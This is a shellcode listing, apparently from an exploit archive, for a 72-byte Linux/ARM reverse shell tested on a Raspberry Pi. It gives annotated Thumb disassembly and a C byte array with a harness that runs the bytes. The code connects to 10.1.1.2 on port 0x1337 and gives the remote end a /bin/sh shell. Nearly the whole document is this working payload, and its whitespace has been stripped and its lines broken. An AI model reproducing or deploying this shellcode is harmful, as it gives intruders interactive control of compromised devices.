[Stricker]

[Raspberry Pi] Linux/ARM - reverse_shell
(tcp,10.1.1.2,0x1337)

Code:

/*
Title: Linux/ARM-reverse_shell
(tcp,10.1.1.2,0x1337)
execve("/bin/sh",[0],[0vars])-72
bytes
Date: 2012-09-08
Testedon:ARM1176JZF-S(v6l)-
RaspberryPi
Author: midnitesnake
####################################

00008054<_start>:
8054: e28f1001
add r1,pc,#1
8058: e12fff11
bx r1
805c: 2002
movs r0,#2
805e: 2101
movs r1,#1
8060: 1a92
subs r2,r2,r2
8062: 020f
lsls r7,r1,#8
8064: 3719
adds r7,#25
8066: df01
svc 1
8068: 1c06
adds r6,r0,#0
806a: a108
add r1,pc,#32 ;(adrr1,
808c<Dup+0x16>)
806c: 2210
movs r2,#16
806e: 3702
adds r7,#2
8070: df01
svc 1
8072: 273f
movs r7,#63;0x3f
8074: 2102
movs r1,#2
00008076<Dup>:
8076: 1c30
adds r0,r6,#0
8078: df01
svc 1
807a: 3901
subs r1,#1
807c: d5fb
bpl.n 8076<Dup>
807e: a005
add r0,pc,#20 ;(adrr0,
8094<Dup+0x1e>)
8080: 1a92
subs r2,r2,r2
8082: b405
push {r0,r2}
8084: 4669
mov r1,sp
8086: 270b
movs r7,#11
8088: df01
svc 1
808a: 46c0
nop ;(movr8,r8)
808c:
37130002 .word 0x37130002
8090:
0301010a .word 0x0301010a
8094:
6e69622f .word 0x6e69622f
8098:
0068732f .word 0x0068732f
809c:
00 .byte 0x00
809d:
00 .byte 0x00
809e: 46c0
nop ;(movr8,r8)
*/
#include<stdio.h>
#include<string.h>
#defineSWAP16(x) ((x)<<8|
((x)>>8))
constunsignedcharsc[]={
0x01,0x10,0x8F,0xE2,
0x11,0xFF,0x2F,0xE1,
0x02,0x20,0x01,0x21,
0x92,0x1a,0x0f,0x02,
0x19,0x37,0x01,0xdf,
0x06,0x1c,0x08,0xa1,
0x10,0x22,0x02,0x37,
0x01,0xdf,0x3f,0x27,
0x02,0x21,
0x30,0x1c,0x01,0xdf,
0x01,0x39,0xfb,0xd5,
0x05,0xa0,0x92,0x1a,
0x05,0xb4,0x69,0x46,
0x0b,0x27,0x01,0xdf,
0xc0,0x46,
/*structsockaddr*/
0x02,0x00,
/*port:0x1337*/
0x13,0x37,
/*ip:10.1.1.2*/
0x0A,0x01,0x01,0x02,
/*"/bin/sh\0"*/
0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x00
};
intmain()
{
printf("shellcode=%dbytes\n"
"connectingto%d.%d.
%d.%d:%hd\n",sizeofsc,
sc[0x3c],sc[0x3d],sc
[0x3e],sc[0x3f],
SWAP16(*((unsigned
short*)(sc+0x3a))));
return((int(*)(void))sc)();
}